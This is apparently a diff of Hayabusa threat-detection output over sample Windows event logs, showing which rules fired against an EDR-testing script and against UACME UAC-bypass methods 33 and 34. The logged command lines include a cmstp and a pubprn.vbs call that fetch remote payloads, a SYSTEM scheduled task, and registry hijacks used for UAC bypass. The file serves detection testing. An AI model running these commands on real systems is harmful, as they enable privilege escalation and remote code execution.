+2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
